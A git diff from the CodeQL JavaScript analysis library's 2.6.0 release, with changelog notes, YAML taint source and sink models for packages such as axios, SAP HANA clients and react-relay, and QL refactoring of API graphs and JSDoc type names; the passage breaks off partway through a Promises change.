+locations_default(#20009,#10000,5,9,10,9) +json_locations(#20008,#20009) +#20010=* +json(#20010,3,#20008,0,"""/bad/(.*)""") +#20011=@"loc,{#10000},6,23,6,33" +locations_default(#20011,#10000,6,23,6,33) +json_locations(#20010,#20011) +json_literals("/bad/(.*)","""/bad/(.*)""",#20010) +json_properties(#20008,"source",#20010) +#20012=* +json(#20012,3,#20008,1,"""srv_api""") +#20013=@"loc,{#10000},7,28,7,36" +locations_default(#20013,#10000,7,28,7,36) +json_locations(#20012,#20013) +json_literals("srv_api","""srv_api""",#20012) +json_properties(#20008,"destination",#20012) +#20014=* +json(#20014,1,#20008,2,"false") +#20015=@"loc,{#10000},8,31,8,35" +locations_default(#20015,#10000,8,31,8,35) +json_locations(#20014,#20015) +json_literals("false","false",#20014) +json_properties(#20008,"csrfProtection",#20014) +#20016=* +json(#20016,3,#20008,3,"""none""") +#20017=@"loc,{#10000},9,35,9,40" +locations_default(#20017,#10000,9,35,9,40) +json_locations(#20016,#20017) +json_literals("none","""none""",#20016) +json_properties(#20008,"authenticationType",#20016) +json_properties(#20000,"routes",#20006) +numlines(#10000,12,0,0) +filetype(#10000,"json") diff --git a/javascript/ql/lib/CHANGELOG.md b/javascript/ql/lib/CHANGELOG.md index a3bb2a7e5d4f..995666b29160 100644 --- a/javascript/ql/lib/CHANGELOG.md +++ b/javascript/ql/lib/CHANGELOG.md @@ -1,3 +1,35 @@ +## 2.6.0 + +### New Features + +* Extraction now supports regular expressions with the `v` flag, using the new operators: + - Intersection `&&` + - Subtraction `--` + - `\q` quoted string + +### Major Analysis Improvements + +* Added support for TypeScript 5.8. + +### Minor Analysis Improvements + +* Added support for additional `fs-extra` methods as sinks in path-injection queries. +* Added support for the newer version of `Hapi` with the `@hapi/hapi` import and `server` function. +* Improved modeling of the `node:fs` module: `await`-ed calls to `read` and `readFile` are now supported. +* Added support for the `@sap/hana-client`, `@sap/hdbext` and `hdb` packages. +* Enhanced `axios` support with new methods (`postForm`, `putForm`, `patchForm`, `getUri`, `create`) and added support for `interceptors.request` and `interceptors.response`. +* Improved support for `got` package with `Options`, `paginate()` and `extend()` +* Added support for the `ApolloServer` class from `@apollo/server` and similar packages. In particular, the incoming data in a GraphQL resolver is now seen as a source of untrusted user input. +* Improved support for `superagent` to handle the case where the package is directly called as a function, or via the `.del()` or `.agent()` method. +* Added support for the `underscore.string` package. +* Added additional flow step for `unescape()` and `escape()`. +* Added support for the `@tanstack/vue-query` package. +* Added taint-steps for `unescape()`. +* Added support for the `@tanstack/angular-query-experimental` package. +* Improved support for the `@angular/common/http` package, detecting outgoing HTTP requests in more cases. +* Improved the modeling of the `markdown-table` package to ensure it handles nested arrays properly. +* Added support for the `react-relay` library. + ## 2.5.1 No user-facing changes. diff --git a/javascript/ql/lib/change-notes/released/2.6.0.md b/javascript/ql/lib/change-notes/released/2.6.0.md new file mode 100644 index 000000000000..037621be6add --- /dev/null +++ b/javascript/ql/lib/change-notes/released/2.6.0.md @@ -0,0 +1,31 @@ +## 2.6.0 + +### New Features + +* Extraction now supports regular expressions with the `v` flag, using the new operators: + - Intersection `&&` + - Subtraction `--` + - `\q` quoted string + +### Major Analysis Improvements + +* Added support for TypeScript 5.8. + +### Minor Analysis Improvements + +* Added support for additional `fs-extra` methods as sinks in path-injection queries. +* Added support for the newer version of `Hapi` with the `@hapi/hapi` import and `server` function. +* Improved modeling of the `node:fs` module: `await`-ed calls to `read` and `readFile` are now supported. +* Added support for the `@sap/hana-client`, `@sap/hdbext` and `hdb` packages. +* Enhanced `axios` support with new methods (`postForm`, `putForm`, `patchForm`, `getUri`, `create`) and added support for `interceptors.request` and `interceptors.response`. +* Improved support for `got` package with `Options`, `paginate()` and `extend()` +* Added support for the `ApolloServer` class from `@apollo/server` and similar packages. In particular, the incoming data in a GraphQL resolver is now seen as a source of untrusted user input. +* Improved support for `superagent` to handle the case where the package is directly called as a function, or via the `.del()` or `.agent()` method. +* Added support for the `underscore.string` package. +* Added additional flow step for `unescape()` and `escape()`. +* Added support for the `@tanstack/vue-query` package. +* Added taint-steps for `unescape()`. +* Added support for the `@tanstack/angular-query-experimental` package. +* Improved support for the `@angular/common/http` package, detecting outgoing HTTP requests in more cases. +* Improved the modeling of the `markdown-table` package to ensure it handles nested arrays properly. +* Added support for the `react-relay` library. diff --git a/javascript/ql/lib/codeql-pack.release.yml b/javascript/ql/lib/codeql-pack.release.yml index a041decfd2dd..29308d702323 100644 --- a/javascript/ql/lib/codeql-pack.release.yml +++ b/javascript/ql/lib/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 2.5.1 +lastReleaseVersion: 2.6.0 diff --git a/javascript/ql/lib/ext/apollo-server.model.yml b/javascript/ql/lib/ext/apollo-server.model.yml new file mode 100644 index 000000000000..ffceb6a6d5af --- /dev/null +++ b/javascript/ql/lib/ext/apollo-server.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: sourceModel + data: + - ["@apollo/server", "Member[ApolloServer,ApolloServerBase].Argument[0].AnyMember.AnyMember.AnyMember.Parameter[1]", "remote"] + + - addsTo: + pack: codeql/javascript-all + extensible: typeModel + data: + - ["@apollo/server", "@apollo/server/standalone", ""] + - ["@apollo/server", "apollo-server-express", ""] + - ["@apollo/server", "apollo-server-core", ""] + - ["@apollo/server", "apollo-server", ""] diff --git a/javascript/ql/lib/ext/axios.model.yml b/javascript/ql/lib/ext/axios.model.yml new file mode 100644 index 000000000000..69740c31e299 --- /dev/null +++ b/javascript/ql/lib/ext/axios.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: sinkModel + data: + - ["axios", "Member[interceptors].Member[request].Member[use].Argument[0].Parameter[0].Member[url]", "request-forgery"] + + - addsTo: + pack: codeql/javascript-all + extensible: sourceModel + data: + - ["axios", "Member[interceptors].Member[response].Member[use].Argument[0].Parameter[0]", "response"] diff --git a/javascript/ql/lib/ext/hana-db-client.model.yml b/javascript/ql/lib/ext/hana-db-client.model.yml new file mode 100644 index 000000000000..1a6b1e8425a6 --- /dev/null +++ b/javascript/ql/lib/ext/hana-db-client.model.yml @@ -0,0 +1,27 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: sinkModel + data: + - ["@sap/hana-client", "Member[createConnection].ReturnValue.Member[exec,prepare].Argument[0]", "sql-injection"] + - ["hdb.Client", "Member[exec,prepare,execute].Argument[0]", "sql-injection"] + - ["@sap/hdbext", "Member[loadProcedure].Argument[2]", "sql-injection"] + - ["@sap/hana-client/extension/Stream", "Member[createProcStatement].Argument[1]", "sql-injection"] + + - addsTo: + pack: codeql/javascript-all + extensible: typeModel + data: + - ["hdb.Client", "hdb", "Member[createClient].ReturnValue"] + - ["hdb.Client", "@sap/hdbext", "Member[middleware].ReturnValue.GuardedRouteHandler.Parameter[0].Member[db]"] + + - addsTo: + pack: codeql/javascript-all + extensible: sourceModel + data: + - ['@sap/hana-client', 'Member[createConnection].ReturnValue.Member[exec].Argument[1].Parameter[1]', 'database-access-result'] + - ['@sap/hana-client', 'Member[createConnection].ReturnValue.Member[prepare].ReturnValue.Member[execBatch,exec,execQuery].Argument[1].Parameter[1]', 'database-access-result'] + - ['hdb.Client', 'Member[exec,execute].Argument[1..2].Parameter[1]', 'database-access-result'] + - ['hdb.Client', 'Member[prepare].Argument[1].Parameter[1].Member[exec].Argument[1].Parameter[2..]', 'database-access-result'] + - ["@sap/hana-client/extension/Stream", "Member[createProcStatement].Argument[2].Parameter[1].Member[exec].Argument[1].Parameter[2..]", "database-access-result"] + - ['@sap/hdbext', 'Member[loadProcedure].Argument[3].Parameter[1].Argument[2].Parameter[2..]', 'database-access-result'] diff --git a/javascript/ql/lib/ext/markdown-table.model.yml b/javascript/ql/lib/ext/markdown-table.model.yml new file mode 100644 index 000000000000..4dcf36164c99 --- /dev/null +++ b/javascript/ql/lib/ext/markdown-table.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: summaryModel + data: + - ["markdown-table", "", "Argument[0].ArrayElement.ArrayElement", "ReturnValue", "taint"] diff --git a/javascript/ql/lib/ext/react-relay-threat.model.yml b/javascript/ql/lib/ext/react-relay-threat.model.yml new file mode 100644 index 000000000000..47b1d086533e --- /dev/null +++ b/javascript/ql/lib/ext/react-relay-threat.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: sourceModel + data: + - ["react-relay", "Member[useFragment].ReturnValue", "response"] + - ["react-relay", "Member[useLazyLoadQuery].ReturnValue", "response"] + - ["react-relay", "Member[usePreloadedQuery].ReturnValue", "response"] + - ["react-relay", "Member[useClientQuery].ReturnValue", "response"] + - ["react-relay", "Member[useRefetchableFragment].ReturnValue.Member[0]", "response"] + - ["react-relay", "Member[usePaginationFragment].ReturnValue.Member[data]", "response"] + - ["react-relay", "Member[useMutation].ReturnValue.Member[0].Argument[0].Member[onCompleted].Parameter[0]", "response"] + - ["react-relay", "Member[useSubscription].Argument[0].Member[onNext].Parameter[0]", "response"] + - ["react-relay", "Member[fetchQuery].ReturnValue.Member[subscribe].Argument[0].Member[next].Parameter[0]", "response"] + - ["relay-runtime", "Member[readFragment].ReturnValue", "response"] diff --git a/javascript/ql/lib/ext/tanstack.model.yml b/javascript/ql/lib/ext/tanstack.model.yml new file mode 100644 index 000000000000..2c07fcf9727c --- /dev/null +++ b/javascript/ql/lib/ext/tanstack.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: summaryModel + data: + - ["@tanstack/angular-query-experimental", "Member[injectQuery]", "Argument[0].ReturnValue.Member[queryFn].ReturnValue", "ReturnValue.Member[data].Awaited", "value"] + - ["@tanstack/angular-query", "Member[injectQuery]", "Argument[0].ReturnValue.Member[queryFn].ReturnValue", "ReturnValue.Member[data].Awaited", "value"] + - ["@tanstack/vue-query", "Member[useQuery]", "Argument[0].Member[queryFn].ReturnValue.Awaited", "ReturnValue.Member[data]", "value"] + - ["@tanstack/vue-query", "Member[useQueries]", "Argument[0].Member[queries].ArrayElement.Member[queryFn].ReturnValue.Awaited", "ReturnValue.ArrayElement.Member[data]", "value"] + - ["@tanstack/react-query", "Member[useQueries]", "Argument[0].Member[queries].ArrayElement.Member[queryFn].ReturnValue.Awaited", "ReturnValue.ArrayElement.Member[data]", "value"] + - ["@tanstack/react-query", "Member[useQuery]", "Argument[0].Member[queryFn].ReturnValue.Awaited", "ReturnValue.Member[data]", "value"] diff --git a/javascript/ql/lib/ext/underscore.string.model.yml b/javascript/ql/lib/ext/underscore.string.model.yml new file mode 100644 index 000000000000..d1330279f74b --- /dev/null +++ b/javascript/ql/lib/ext/underscore.string.model.yml @@ -0,0 +1,35 @@ +extensions: + - addsTo: + pack: codeql/javascript-all + extensible: typeModel + data: + - ["'underscore.string'.Wrapper", "'underscore.string'", "ReturnValue"] + - ["'underscore.string'.Wrapper", "'underscore.string'.Wrapper", "Member[slugify,capitalize,decapitalize,clean,cleanDiacritics,swapCase,escapeHTML,unescapeHTML,wrap,dedent,reverse,pred,succ,titleize,camelize,classify,underscored,dasherize,humanize,trim,ltrim,rtrim,truncate,sprintf,strRight,strRightBack,strLeft,strLeftBack,stripTags,unquote,strip,lstrip,rstrip,camelcase].ReturnValue"] + - ["'underscore.string'.Wrapper", "'underscore.string'.Wrapper", "Member[insert,replaceAll,join,splice,prune,pad,lpad,rpad,repeat,surround,quote,q,rjust,ljust].ReturnValue"] + - ["'underscore.string'.Wrapper", "'underscore.string'.Wrapper", "Member[toUpperCase,toLowerCase,replace,slice,substring,substr,concat].ReturnValue"] + - ["'underscore.string'.Wrapper", "'underscore.string'.Wrapper", "Member[tap].ReturnValue"] + + - addsTo: + pack: codeql/javascript-all + extensible: summaryModel + data: + - ["'underscore.string'", "Member[slugify,capitalize,decapitalize,clean,cleanDiacritics,swapCase,escapeHTML,unescapeHTML,wrap,dedent,reverse,pred,succ,titleize,camelize,classify,underscored,dasherize,humanize,trim,ltrim,rtrim,truncate,sprintf,strRight,strRightBack,strLeft,strLeftBack,stripTags,unquote,strip,lstrip,rstrip,camelcase]", "Argument[0]", "ReturnValue", "taint"] + - ["'underscore.string'", "Member[chop,chars,words,lines]", "Argument[0]", "ReturnValue.ArrayElement", "taint"] + - ["'underscore.string'", "Member[toSentence,toSentenceSerial]", "Argument[0].ArrayElement", "ReturnValue", "taint"] + - ["'underscore.string'", "Member[insert,replaceAll,splice,prune,pad,lpad,rpad,repeat,rjust,ljust]", "Argument[0,2]", "ReturnValue", "taint"] + - ["'underscore.string'", "Member[splice]", "Argument[0,3]", "ReturnValue", "taint"] + - ["'underscore.string'", "Member[join]", "Argument[0..]", "ReturnValue", "taint"] + - ["'underscore.string'", "Member[surround,quote,q]", "Argument[0,1]", "ReturnValue", "taint"] + - ["'underscore.string'", "", "Argument[0]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[slugify,capitalize,decapitalize,clean,cleanDiacritics,swapCase,escapeHTML,unescapeHTML,wrap,dedent,reverse,pred,succ,titleize,camelize,classify,underscored,dasherize,humanize,trim,ltrim,rtrim,truncate,sprintf,strRight,strRightBack,strLeft,strLeftBack,stripTags,unquote,value,strip,lstrip,rstrip,camelcase]", "Argument[this]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[insert,replaceAll,join,splice,prune,pad,lpad,rpad,repeat,surround,quote,q,rjust,ljust]", "Argument[this]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[insert,replaceAll,prune,pad,lpad,rpad,repeat,rjust,ljust]", "Argument[1]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[surround,quote,q]", "Argument[0]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[splice]", "Argument[2]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[join,concat]", "Argument[0..]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[toUpperCase,toLowerCase,replace,slice,substring,substr,split]", "Argument[this]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[tap]", "Argument[this]", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[tap]", "Argument[0].ReturnValue", "ReturnValue", "taint"] + - ["'underscore.string'.Wrapper", "Member[tap]", "Argument[this]", "Argument[0].Parameter[1]", "taint"] + - ["'underscore.string'", "Member[map]", "Argument[0]", "Argument[1].Parameter[0]", "taint"] + - ["'underscore.string'", "Member[map]", "Argument[1].ReturnValue", "ReturnValue", "taint"] diff --git a/javascript/ql/lib/javascript.qll b/javascript/ql/lib/javascript.qll index b3bf7399a621..cc4d15158b90 100644 --- a/javascript/ql/lib/javascript.qll +++ b/javascript/ql/lib/javascript.qll @@ -139,8 +139,8 @@ import semmle.javascript.frameworks.Webix import semmle.javascript.frameworks.WebSocket import semmle.javascript.frameworks.XmlParsers import semmle.javascript.frameworks.xUnit -import semmle.javascript.frameworks.Tanstack import semmle.javascript.linters.ESLint import semmle.javascript.linters.JSLint import semmle.javascript.linters.Linting import semmle.javascript.security.dataflow.RemoteFlowSources +import semmle.javascript.frameworks.UnderscoreDotString diff --git a/javascript/ql/lib/qlpack.yml b/javascript/ql/lib/qlpack.yml index 28a02249cfd8..9a38483496e4 100644 --- a/javascript/ql/lib/qlpack.yml +++ b/javascript/ql/lib/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/javascript-all -version: 2.5.1 +version: 2.6.0 groups: javascript dbscheme: semmlecode.javascript.dbscheme extractor: javascript diff --git a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll index 9e866424c619..4ef187de4d89 100644 --- a/javascript/ql/lib/semmle/javascript/ApiGraphs.qll +++ b/javascript/ql/lib/semmle/javascript/ApiGraphs.qll @@ -8,6 +8,10 @@ import javascript private import semmle.javascript.dataflow.internal.FlowSteps as FlowSteps private import semmle.javascript.dataflow.internal.PreCallGraphStep +private import semmle.javascript.dataflow.internal.StepSummary +private import semmle.javascript.dataflow.internal.sharedlib.SummaryTypeTracker as SummaryTypeTracker +private import semmle.javascript.dataflow.internal.Contents::Private as ContentPrivate +private import semmle.javascript.DynamicPropertyAccess private import internal.CachedStages /** @@ -220,15 +224,53 @@ module API { } /** - * Gets a node representing a member of this API component where the name of the member is - * not known statically. + * DEPRECATED. Use either `getArrayElement()` or `getAMember()` instead. */ + deprecated Node getUnknownMember() { result = this.getArrayElement() } + + /** + * Gets an array element of unknown index. + */ + cached + Node getUnknownArrayElement() { + Stages::ApiStage::ref() and + result = this.getASuccessor(Label::content(ContentPrivate::MkArrayElementUnknown())) + } + cached - Node getUnknownMember() { + private Node getContentRaw(DataFlow::Content content) { Stages::ApiStage::ref() and - result = this.getASuccessor(Label::unknownMember()) + result = this.getASuccessor(Label::content(content)) } + /** + * Gets a representative for the `content` of this value. + * + * When possible, it is preferrable to use one of the specialized variants of this predicate, such as `getMember`. + */ + pragma[inline] + Node getContent(DataFlow::Content content) { + result = this.getContentRaw(content) + or + result = this.getMember(content.asPropertyName()) + } + + /** + * Gets a representative for the `contents` of this value. + */ + bindingset[contents] + pragma[inline_late] + private Node getContents(DataFlow::ContentSet contents) { + // We always use getAStoreContent when generating content edges, and we always use getAReadContent when querying the graph. + result = this.getContent(contents.getAReadContent()) + } + + /** + * Gets a node representing an arbitrary array element in the array represented by this node. + */ + cached + Node getArrayElement() { result = this.getContents(DataFlow::ContentSet::arrayElement()) } + /** * Gets a node representing a member of this API component where the name of the member may * or may not be known statically. @@ -238,7 +280,7 @@ module API { Stages::ApiStage::ref() and result = this.getMember(_) or - result = this.getUnknownMember() + result = this.getUnknownArrayElement() } /** @@ -790,6 +832,11 @@ module API { not DataFlow::PseudoProperties::isPseudoProperty(prop) ) or + exists(DataFlow::ContentSet contents | + SummaryTypeTracker::basicStoreStep(rhs, pred.getALocalUse(), contents) and + lbl = Label::content(contents.getAStoreContent()) + ) + or exists(DataFlow::FunctionNode fn | fn = pred and lbl = Label::return() @@ -982,6 +1029,11 @@ module API { // avoid generating member edges like "$arrayElement$" not DataFlow::PseudoProperties::isPseudoProperty(prop) ) + or + exists(DataFlow::ContentSet contents | + SummaryTypeTracker::basicLoadStep(pred.getALocalUse(), ref, contents) and + lbl = Label::content(contents.getAStoreContent()) + ) ) or exists(DataFlow::Node def, DataFlow::FunctionNode fn | @@ -1199,8 +1251,6 @@ module API { t = useStep(nd, promisified, boundArgs, prop, result) } - private import semmle.javascript.dataflow.internal.StepSummary - /** * Holds if `nd`, which is a use of an API-graph node, flows in zero or more potentially * inter-procedural steps to some intermediate node, and then from that intermediate node to @@ -1458,8 +1508,21 @@ module API { bindingset[result] LabelMember member(string m) { result.getProperty() = m } - /** Gets the `member` edge label for the unknown member. */ - LabelUnknownMember unknownMember() { any() } + /** Gets the `content` edge label for content `c`. */ + LabelContent content(ContentPrivate::Content c) { result.getContent() = c } + + /** + * Gets the edge label for an unknown member. + * + * Currently this is represented the same way as an unknown array element, but this may + * change in the future. + */ + ApiLabel unknownMember() { result = arrayElement() } + + /** + * Gets the edge label for an unknown array element. + */ + LabelContent arrayElement() { result.getContent().isUnknownArrayElement() } /** * Gets a property name referred to by the given dynamic property access, @@ -1482,6 +1545,11 @@ module API { result = unique(string s | s = getAnIndirectPropName(ref)) } + pragma[nomagic] + private predicate isEnumeratedPropName(DataFlow::Node node) { + node.getAPredecessor*() instanceof EnumeratedPropName + } + /** Gets the `member` edge label for the given property reference. */ ApiLabel memberFromRef(DataFlow::PropRef pr) { exists(string pn | pn = pr.getPropertyName() or pn = getIndirectPropName(pr) | @@ -1493,7 +1561,9 @@ module API { or not exists(pr.getPropertyName()) and not exists(getIndirectPropName(pr)) and - result = unknownMember() + // Avoid assignments in an extend-like pattern + not isEnumeratedPropName(pr.getPropertyNameExpr().flow()) and + result = arrayElement() } /** Gets the `instance` edge label. */ @@ -1516,10 +1586,10 @@ module API { LabelForwardingFunction forwardingFunction() { any() } /** Gets the `promised` edge label connecting a promise to its contained value. */ - LabelPromised promised() { any() } + LabelContent promised() { result.getContent() = ContentPrivate::MkPromiseValue() } /** Gets the `promisedError` edge label connecting a promise to its rejected value. */ - LabelPromisedError promisedError() { any() } + LabelContent promisedError() { result.getContent() = ContentPrivate::MkPromiseError() } /** Gets the label for an edge leading from a value `D` to any class that has `D` as a decorator. */ LabelDecoratedClass decoratedClass() { any() } @@ -1542,18 +1612,12 @@ module API { exists(Impl::MkModuleImport(mod)) } or MkLabelInstance() or - MkLabelMember(string prop) { - exports(_, prop, _) or - exists(any(DataFlow::ClassNode c).getInstanceMethod(prop)) or - prop = "exports" or - prop = any(CanonicalName c).getName() or - prop = any(DataFlow::PropRef p).getPropertyName() or - exists(Impl::MkTypeUse(_, prop)) or - exists(any(Module m).getAnExportedValue(prop)) or - PreCallGraphStep::loadStep(_, _, prop) or - PreCallGraphStep::storeStep(_, _, prop) + MkLabelContent(DataFlow::Content content) or + MkLabelMember(string name) { + name instanceof PropertyName + or + exists(Impl::MkTypeUse(_, name)) } or - MkLabelUnknownMember() or MkLabelParameter(int i) { i = [0 .. max(int args | @@ -1564,8 +1628,6 @@ module API { } or MkLabelReceiver() or MkLabelReturn() or - MkLabelPromised() or - MkLabelPromisedError() or MkLabelDecoratedClass() or MkLabelDecoratedMember() or MkLabelDecoratedParameter() or @@ -1585,13 +1647,13 @@ module API { } /** A label that gets a promised value. */ - class LabelPromised extends ApiLabel, MkLabelPromised { - override string toString() { result = "getPromised()" } + deprecated class LabelPromised extends ApiLabel { + LabelPromised() { this = MkLabelContent(ContentPrivate::MkPromiseValue()) } } /** A label that gets a rejected promise. */ - class LabelPromisedError extends ApiLabel, MkLabelPromisedError { - override string toString() { result = "getPromisedError()" } + deprecated class LabelPromisedError extends ApiLabel { + LabelPromisedError() { this = MkLabelContent(ContentPrivate::MkPromiseError()) } } /** A label that gets the return value of a function. */ @@ -1617,9 +1679,39 @@ module API { override string toString() { result = "getInstance()" } } + /** A label for a content. */ + class LabelContent extends ApiLabel, MkLabelContent { + private DataFlow::Content content; + + LabelContent() { + this = MkLabelContent(content) and + // Property names are represented by LabelMember to ensure additional property + // names from PreCallGraph step are included, as well as those from MkTypeUse. + not content instanceof ContentPrivate::MkPropertyContent + } + + /** Gets the content associated with this label. */ + DataFlow::Content getContent() { result = content } + + private string specialisedToString() { + content instanceof ContentPrivate::MkPromiseValue and result = "getPromised()" + or + content instanceof ContentPrivate::MkPromiseError and result = "getPromisedError()" + or + content instanceof ContentPrivate::MkArrayElementUnknown and result = "getArrayElement()" + } + + override string toString() { + result = this.specialisedToString() + or + not exists(this.specialisedToString()) and + result = "getContent(" + content + ")" + } + } + /** A label for the member named `prop`. */ class LabelMember extends ApiLabel, MkLabelMember { - string prop; + private string prop; LabelMember() { this = MkLabelMember(prop) } @@ -1630,10 +1722,8 @@ module API { } /** A label for a member with an unknown name. */ - class LabelUnknownMember extends ApiLabel, MkLabelUnknownMember { - LabelUnknownMember() { this = MkLabelUnknownMember() } - - override string toString() { result = "getUnknownMember()" } + deprecated class LabelUnknownMember extends LabelContent { + LabelUnknownMember() { this.getContent().isUnknownArrayElement() } } /** A label for parameter `i`. */ diff --git a/javascript/ql/lib/semmle/javascript/DOM.qll b/javascript/ql/lib/semmle/javascript/DOM.qll index 6c6d70fede87..50a529b4a53a 100644 --- a/javascript/ql/lib/semmle/javascript/DOM.qll +++ b/javascript/ql/lib/semmle/javascript/DOM.qll @@ -296,7 +296,7 @@ module DOM { .getType() .getAnUnderlyingType() .(JSDocNamedTypeExpr) - .getName()) + .getRawName()) ) } diff --git a/javascript/ql/lib/semmle/javascript/Externs.qll b/javascript/ql/lib/semmle/javascript/Externs.qll index 9787de6f464b..a2a2533d8494 100644 --- a/javascript/ql/lib/semmle/javascript/Externs.qll +++ b/javascript/ql/lib/semmle/javascript/Externs.qll @@ -400,8 +400,8 @@ class ConstructorTag extends JSDocTag { abstract private class NamedTypeReferent extends JSDocTag { /** Gets the name of the type to which this tag refers. */ string getTarget() { - result = this.getType().(JSDocNamedTypeExpr).getName() or - result = this.getType().(JSDocAppliedTypeExpr).getHead().(JSDocNamedTypeExpr).getName() + result = this.getType().(JSDocNamedTypeExpr).getRawName() or + result = this.getType().(JSDocAppliedTypeExpr).getHead().(JSDocNamedTypeExpr).getRawName() } /** @@ -423,7 +423,7 @@ abstract private class NamedTypeReferent extends JSDocTag { * Gets the source declaration of the type to which `tp` refers, if any. */ private ExternalType sourceDecl(JSDocTypeExpr tp) { - result.getQualifiedName() = tp.(JSDocNamedTypeExpr).getName() or + result.getQualifiedName() = tp.(JSDocNamedTypeExpr).getRawName() or result = sourceDecl(tp.(JSDocAppliedTypeExpr).getHead()) or result = sourceDecl(tp.(JSDocNullableTypeExpr).getTypeExpr()) or result = sourceDecl(tp.(JSDocNonNullableTypeExpr).getTypeExpr()) or diff --git a/javascript/ql/lib/semmle/javascript/JSDoc.qll b/javascript/ql/lib/semmle/javascript/JSDoc.qll index 6e1ea5caecb6..10970a2e8b04 100644 --- a/javascript/ql/lib/semmle/javascript/JSDoc.qll +++ b/javascript/ql/lib/semmle/javascript/JSDoc.qll @@ -261,17 +261,14 @@ class JSDocVoidTypeExpr extends @jsdoc_void_type_expr, JSDocTypeExpr { } /** - * A type expression referring to a named type. - * - * Example: + * An identifier in a JSDoc type expression, such as `Object` or `string`. * - * ``` - * string - * Object - * ``` + * Note that qualified names consist of multiple identifier nodes. */ -class JSDocNamedTypeExpr extends @jsdoc_named_type_expr, JSDocTypeExpr { - /** Gets the name of the type the expression refers to. */ +class JSDocIdentifierTypeExpr extends @jsdoc_identifier_type_expr, JSDocTypeExpr { + /** + * Gets the name of the identifier. + */ string getName() { result = this.toString() } override predicate isString() { this.getName() = "string" } @@ -300,6 +297,71 @@ class JSDocNamedTypeExpr extends @jsdoc_named_type_expr, JSDocTypeExpr { } override predicate isRawFunction() { this.getName() = "Function" } +} + +/** + * An unqualified identifier in a JSDoc type expression. + * + * Example: + * + * ``` + * string + * Object + * ``` + */ +class JSDocLocalTypeAccess extends JSDocIdentifierTypeExpr { + JSDocLocalTypeAccess() { not this = any(JSDocQualifiedTypeAccess a).getNameNode() } +} + +/** + * A qualified type name in a JSDoc type expression, such as `X.Y`. + */ +class JSDocQualifiedTypeAccess extends @jsdoc_qualified_type_expr, JSDocTypeExpr { + /** + * Gets the base of this access, such as the `X` in `X.Y`. + */ + JSDocTypeExpr getBase() { result = this.getChild(0) } + + /** + * Gets the node naming the member being accessed, such as the `Y` node in `X.Y`. + */ + JSDocIdentifierTypeExpr getNameNode() { result = this.getChild(1) } + + /** + * Gets the name being accessed, such as `Y` in `X.Y`. + */ + string getName() { result = this.getNameNode().getName() } +} + +/** + * A type expression referring to a named type. + * + * Example: + * + * ``` + * string + * Object + * Namespace.Type + * ``` + */ +class JSDocNamedTypeExpr extends JSDocTypeExpr { + JSDocNamedTypeExpr() { + this instanceof JSDocLocalTypeAccess + or + this instanceof JSDocQualifiedTypeAccess + } + + /** + * Gets the name directly as it appears in this type, including any qualifiers. + * + * For example, for `X.Y` this gets the string `"X.Y"`. + */ + string getRawName() { result = this.toString() } + + /** + * DEPRECATED. Use `getRawName()` instead. + */ + deprecated string getName() { result = this.toString() } /** * Holds if this name consists of the unqualified name `prefix` @@ -310,8 +372,9 @@ class JSDocNamedTypeExpr extends @jsdoc_named_type_expr, JSDocTypeExpr { * - `Baz` has prefix `Baz` and an empty suffix. */ predicate hasNameParts(string prefix, string suffix) { + not this = any(JSDocQualifiedTypeAccess a).getBase() and // restrict size of predicate exists(string regex, string name | regex = "([^.]+)(.*)" | - name = this.getName() and + name = this.getRawName() and prefix = name.regexpCapture(regex, 1) and suffix = name.regexpCapture(regex, 2) ) @@ -340,7 +403,7 @@ class JSDocNamedTypeExpr extends @jsdoc_named_type_expr, JSDocTypeExpr { globalName = this.resolvedName() or not exists(this.resolvedName()) and - globalName = this.getName() + globalName = this.getRawName() } override DataFlow::ClassNode getClass() { diff --git a/javascript/ql/lib/semmle/javascript/MembershipCandidates.qll b/javascript/ql/lib/semmle/javascript/MembershipCandidates.qll index da9e90744ef0..b294cb7ca3ab 100644 --- a/javascript/ql/lib/semmle/javascript/MembershipCandidates.qll +++ b/javascript/ql/lib/semmle/javascript/MembershipCandidates.qll @@ -140,22 +140,17 @@ module MembershipCandidate { EnumerationRegExp() { this.isRootTerm() and RegExp::isFullyAnchoredTerm(this) and - exists(RegExpTerm child | this.getAChild*() = child | - child instanceof RegExpSequence or - child instanceof RegExpCaret or - child instanceof RegExpDollar or - child instanceof RegExpConstant or - child instanceof RegExpAlt or - child instanceof RegExpGroup - ) and - // exclude "length matches" that match every string - not this.getAChild*() instanceof RegExpDot + not exists(RegExpTerm child | child.getRootTerm() = this | + child instanceof RegExpDot or + child instanceof RegExpCharacterClass or + child instanceof RegExpUnicodePropertyEscape + ) } /** * Gets a string matched by this regular expression. */ - string getAMember() { result = this.getAChild*().getAMatchedString() } + string getAMember() { result = any(RegExpTerm t | t.getRootTerm() = this).getAMatchedString() } } /** diff --git a/javascript/ql/lib/semmle/javascript/Promises.qll b/javascript/ql/lib/semmle/javascript/Promises.qll index c254128f87b5..51411463efc6 100644 --- a/javascript/ql/lib/semmle/javascript/Promises.qll +++ b/javascript/ql/lib/semmle/javascript/Promises.qll @@ -4,6 +4,7 @@ import javascript private import dataflow.internal.StepSummary +private import semmle.javascript.dataflow.internal.FlowSteps /** * A call to the `Promise` constructor, such as `new Promise((resolve, reject) => { ... })`. @@ -397,6 +398,17 @@ module PromiseFlow { value = 